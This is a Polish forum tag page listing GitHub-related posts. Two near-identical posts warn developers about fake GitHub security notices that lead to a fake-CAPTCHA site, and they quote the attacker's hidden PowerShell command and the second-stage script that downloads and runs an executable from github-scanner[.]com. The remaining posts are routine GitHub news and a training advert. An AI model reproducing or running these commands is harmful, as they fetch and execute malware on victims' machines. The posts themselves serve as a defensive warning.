Znajdź zawartość
Wyświetlanie wyników dla tagów 'GitHub' .
Znaleziono 6 wyników
-
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści: fot. przesłana prze z Jana Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to: Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę: powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX" A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem: $webClient = New-Object System.Net.WebClient $url1 = "https://github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka… Na jakie jeszcze ataki powinni uważać programiści? Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki i nauka niezliczonych technik i narzędzi, które pokazują jak można “zhackować” webaplikację i oczywiście — jak się przed takimi atakami poprawnie zabezpieczyć. Gdańsk: 03-04 października 2024r. — UWAGA: zostały tylko 2 wolne miejsca Ostatnio ktoś zarejestrował się 10 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 20 września) 2699 PLN netto (od 21 września) Warszawa: 07-08 października 2024r. — UWAGA: zostały tylko 4 wolne miejsca Ostatnio ktoś zarejestrował się 16 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 20 września) 2699 PLN netto (od 21 września) ZDALNIE: 19-20 października 2024r. — zostało 5 wolnych miejsc Ostatnio ktoś zarejestrował się 18 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 20 września) 2699 PLN netto (od 21 września) Kraków: 18-19 listopada 2024r. — zostało 7 wolnych miejsc Ostatnio ktoś zarejestrował się 19 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 27 września) 2699 PLN netto (od 28 września) Warszawa: 16-17 grudnia 2024r. — zostało 9 wolnych miejsc Ostatnio ktoś zarejestrował się 19 września 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 27 września) 2699 PLN netto (od 28 września) Większość uczestników tego szkolenia opłaca je z firmowego budżetu szkoleniowego, jeśli potrzebujesz argumentów, aby przekonać swojego szefa, żeby Cię wysłał na to szkolenie, napisz na [email protected], a nasze koleżanki prześlą Ci PDF dla szefa :) PS. Jeśli zarejestrujesz się na któryś z powyższych terminów z kodem “GITHUB” do końca tygodnia, to otrzymasz zniżkę w wysokości 100 PLN. Przeczytaj cały wpis -
Uwaga programiści! Ktoś wysyła cwane komunikaty przez GitHuba
1s2k.pl opublikował(a) temat w Cyberbezpieczeństwo
Jak informują nas programiści posiadający konto na GitHubie, od wczoraj otrzymują powiadomienia o następującej treści: fot. przesłana prze z Jana Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue. Best regards, Github Security Team Powiadomienia są triggerowane przez dodanie (a następnie usunięcie) tzw. “issue” do projektu. Gdzie prowadzi link? Ano do strony, która próbuje na programiście wykonać atak “na CAPTCHA” opisywany przez nas ponad 2 tygodnie temu w ramach CyberAlertu. Ofiara widzi to: Kliknięcie w przycisk na pierwszym ekranie kopiuje do schowka ofiary następującą komendę: powershell.exe -w hidden -Command "iex (iwr 'https://github-scanner[.]com/download.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: XXXXXX" A zastosowanie się do instrukcji widocznej na kolejnym ekranie uruchamia powyższą komendę, czyli w konsekwencji następujący kod infekujący komputer ofiary złośliwym oprogramowaniem: $webClient = New-Object System.Net.WebClient $url1 = "https://github-scanner[.]com/l6E.exe" $filePath1 = "$env:TEMP\SysSetup.exe" $webClient.DownloadFile($url1, $filePath1) Start-Process -FilePath $env:TEMP\SysSetup.exe Szczerze mówiąc, trochę nas dziwi dobór ofiar. Programiści akurat są świadomi, co robi skrót WIN+R. Z drugiej jednak strony, zainfekować programistę popularnego projektu na GitHubie to jak wygrać w totka… Na jakie jeszcze ataki powinni uważać programiści? Jeśli chcesz poznać wszystkie ataki, na które powinni być wyczuleni programiści aplikacji webowych, to wpadnij na nasze szkolenie z “Atakowanie i Ochrony Webaplikacji”. To dwa dni pełne praktyki i nauka niezliczonych technik i narzędzi, które pokazują jak można “zhackować” webaplikację i oczywiście — jak się przed takimi atakami poprawnie zabezpieczyć. ZDALNIE: 19-20 października 2024r. — UWAGA: zostało tylko 1 wolne miejsce Ostatnio ktoś zarejestrował się 10 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 11 października) 2699 PLN netto (od 12 października) Kraków: 18-19 listopada 2024r. — UWAGA: zostało tylko 1 wolne miejsce Ostatnio ktoś zarejestrował się 10 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 11 października) 2699 PLN netto (od 12 października) ZDALNIE: 25-26 listopada 2024r. — zostało 7 wolnych miejsc Ostatnio ktoś zarejestrował się 11 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 11 października) 2699 PLN netto (od 12 października) Warszawa: 16-17 grudnia 2024r. — zostało 7 wolnych miejsc Ostatnio ktoś zarejestrował się 09 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 18 października) 2699 PLN netto (od 19 października) Poznań: 20-21 stycznia 2025r. — zostało 9 wolnych miejsc Ostatnio ktoś zarejestrował się 02 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 25 października) 2699 PLN netto (od 26 października) Gdańsk: 07-08 kwietnia 2025r. — zostało 9 wolnych miejsc Ostatnio ktoś zarejestrował się 11 października 2024r. → zarejestruj się na to szkolenie 2399 PLN netto (do 25 października) 2699 PLN netto (od 26 października) Większość uczestników tego szkolenia opłaca je z firmowego budżetu szkoleniowego, jeśli potrzebujesz argumentów, aby przekonać swojego szefa, żeby Cię wysłał na to szkolenie, napisz na [email protected], a nasze koleżanki prześlą Ci PDF dla szefa :) PS. Jeśli zarejestrujesz się na któryś z powyższych terminów z kodem “GITHUB” do końca tygodnia, to otrzymasz zniżkę w wysokości 100 PLN. Przeczytaj cały wpis -
Dokładnie dwa lata temu Microsoft wystartował z programem Microsoft for Startups, który ma na celu wspomaganie startupów technologią, rozwiązaniami wejścia na rynek i korzyściami społecznymi, które przyczyniają się do sukcesu startupów. Gigant postanowił też zostać wiodącą na świecie chmurą firmową dla startupów B2B. Startupy technologiczne B2B zaliczyły przez ostatnie 2 lata ogromny wzrost. Microsoft for Startups był tego naocznym świadkiem. Z jego rozwiązań dla klientów biznesowych skorzystały tysiące startupów z ponad 140 krajów. Microsoft szacuje, że startupy te w samym tylko bieżącym roku wygenerują 1 miliard dolarów poprzez możliwości sprzedaży. Gigant tymczasem rozszerza korzyści w programie, oferując firmom: GitHub Enterprise: Od wczoraj wszystkie nowe i istniejące startupy w programie otrzymują dostęp do GitHub Enterprise. Rozszerza on elastyczność i funkcjonalność GitHub o funkcje, które ułatwiają administrowanie kontem i dostarczają dodatkową kontrolę ochrony, zgodności i wdrażania na skalę zespołową. Microsoft Power Platform: W kolejnych miesiącach wszystkie nowe i istniejące startupy w programie otrzymają też dostęp do Microsoft Power Platform, która wspomaga organizacje w analizie danych, budowaniu rozwiązań, automatyzacji procesów i tworzeniu agentów wirtualnych. Przez ostatnie dwa lata Microsoft przeznaczył na cele programu 500 milionów dolarów, a dokładniej na wspólne działania sprzedażowe, udostępnianie swoich technologii i organizację nowych przestrzeni społecznościowych, które będą promować współpracę między ekosystemami lokalnymi i globalnymi. Dlaczego gigant tak chętnie inwestuje w przyszłość małych firm? Chyba najlepszą odpowiedzią będzie wypowiedź Satyi Nadelli sprzed roku: W naszym modelu biznesowym chodzi o tworzenie większego nadmiaru poza nami samymi. Będziemy odnosić długoterminowy sukces tylko wtedy, gdy ludzie wokół nas będą zarabiać więcej pieniędzy. – Satya Nadella, CEO Microsoft Przeczytaj cały wpis
-
GitHub przedstawia łatwiejszy i bardziej bezproblemowy sposób na korzystanie z serwisu poprzez wiersz polecenia — GitHub CLI. Usługa jest już dostępna w wersji beta i wprowadza GitHub wprost do terminala. GitHub CLI może być zainstalowany na systemach macOS, Windows i Linux, a twórcy zapowiadają rozszerzenie go na kolejne platformy po wyjściu z fazy beta. Co można robić za pomocą tego narzędzia? Twórcy narzędzia zaczęli od dwóch obszarów: issues i pull requests, ponieważ wielu deweloperów używa ich codziennie. GitHub CLI można wykorzystać do: Filtrowania list według potrzeb: Szybkiego podglądu szczegółów: Tworzenia pull requestów: Podglądu stanu pracy: Łatwego sprawdzania pull requestów: To dopiero początek, a GitHub planuje mocno rozbudować doświadczenie CLI, dlatego liczy na feedback społeczności. Warto też przypomnieć, że z aplikacji GitHub można od niedawna korzystać także na telefonach z Androidem. Przeczytaj cały wpis
-
GitHub, Inc. ogłosił otwarcie nowego oddziału GitHub India Private Limited. Dlaczego akurat Indie? Region ten świetnie się rozwija i jest trzecim co do wielkości pod względem liczby deweloperów na GitHub. W zeszłym roku zaliczył wzrost rzędu 22%, zaczynając z i tak już niezłej bazy. Aby lepiej służyć deweloperom i klientom biznesowym, GitHub postanowił być bliżej nich. Namaste! Nowo ogłoszonym General Managerem w GitHub India został Maneesh Sharma. Pokieruje on strategią wzrostu w tym kraju. Przez następne miesiące firma będzie tworzyć zespół odpowiedzialny za wszystkie funkcje — społeczność, inżynierię, sprzedaż, wsparcie, marketing i usługi. Ma to umożliwić klientom skalowalną adaptację najlepszych praktyk DevOps i współpracę z ponad 40 milionami deweloperów nad ponad 100 milionami projektów. Jako trzecia największa grupa deweloperów na GitHub indyjscy programiści faktycznie budują przyszłość oprogramowania. Przez ostatni rok liczba publicznych repozytoriów w Indiach wzrosła o 75%, pokazując wyraźny rozrost współpracy w indyjskiej społeczności programistycznej. Budując nasz lokalny zespół w Indiach, naszym celem jest ustanowienie silnych więzów z deweloperami i wspieranie rozwoju open source wśród deweloperów, opiekunów i przedsiębiorstw. — Erica Brescia, GitHub GitHub brał pod uwagę również fakt, że Indie są domem jednej z największych na świecie społeczności deweloperskiej wśród studentów. Ich wspieranie firma postrzega jako dobrą inwestycję w przyszłość open source. W realizacji tego celu pomoże program GitHub Hackathon Grant, którego zasięg GitHub Education rozszerzył także na Indie. Program bezpośrednio wspiera studenckie hackathony i wypłaca granty dochodzące do 1000 dolarów. Istotny jest również udział sekcji GitHub Enterprise. Rosnąca liczba lokalnych firm, takich jak Swiggy i ArisGlobal, rozwija na platformie swoje oprogramowanie, które napędza ich biznesy. GitHub współpracuje z firmami ze wszystkich sektorów, dostarczając im nowoczesny łańcuch dostaw oprogramowania i najlepsze w swojej klasie praktyki. GitHub Enterprise rozszerza też swój program partnerski dla klientów. Przeczytaj cały wpis
-
Narzędzia do współpracy GitHub trafiły na małe ekrany. Na zeszłorocznym evencie GitHub Universe 2019 padła zapowiedź aplikacji mobilnej GitHub na iOS i Androida. Jeśli chodzi o iPhone'y, wersja beta stała się dostępna w listopadzie. Wydanie jej również na Androidzie było tylko kwestią czasu. Aplikacja w końcu nadeszła i można ją już pobrać. Co warto o niej wiedzieć? Jest wiele rzeczy do zrobienia w GitHub, które nie wymagają złożonego środowiska programistycznego, jak na przykład udostępnianie feedbacku w dyskusji o designie czy przejrzenie paru linijek kodu. Ułatwiamy wykonywanie tych zadań, gdy jesteście w drodze, zapewniając w pełni natywne doświadczenie. GitHub dla urządzeń mobilnych daje wam elastyczność, by posuwać się z pracą do przodu i pozostawać w kontakcie z zespołem niezależnie od tego, gdzie jesteście. — Ryan Nystrom, GitHub GitHub w wersji mobilnej pozwala przeglądać kod, scalać zmiany i współpracować z innymi. Aplikacji można używać na dowolnym telefonie z Androidem 5.1 lub nowszym. Jako że aplikacja jest w pełni natywna, wspiera ona różne rozmiary ekranu i ustawienia, wliczając w to ciemny motyw. Użytkownicy, którzy zapisali się wcześniej na listę oczekującą, powinni już dostać e-maila z zaproszeniem i linkiem do wersji testowej. Ci, którzy tego nie zrobili, wciąż mają możliwość pobrania wersji beta, niemniej jednak liczba stanowisk jest ograniczona. Wystarczy zarejestrować się w programie testów i pobrać aplikację GitHub (wcześniejszy dostęp) ze Sklepu Play. Przeczytaj cały wpis
-
Ostatnio przeglądający 0 użytkowników
- Brak zarejestrowanych użytkowników przeglądających tę stronę.